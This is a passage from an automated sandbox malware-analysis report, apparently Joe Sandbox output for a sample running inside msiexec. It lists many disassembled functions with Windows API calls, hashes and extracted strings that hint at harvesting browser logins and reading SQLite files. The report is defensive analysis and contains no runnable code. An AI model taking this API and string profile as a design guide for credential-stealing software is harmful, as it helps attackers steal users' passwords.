                                                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 59245283-0
                                                                                                                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                • String ID: 3A
                                                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                • String ID: strings
                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041249C
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                • String ID: BIN
                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                • memset.MSVCRT ref: 00405E33
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2047574939-0
                                                                                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                • API String ID: 384018552-4153097237
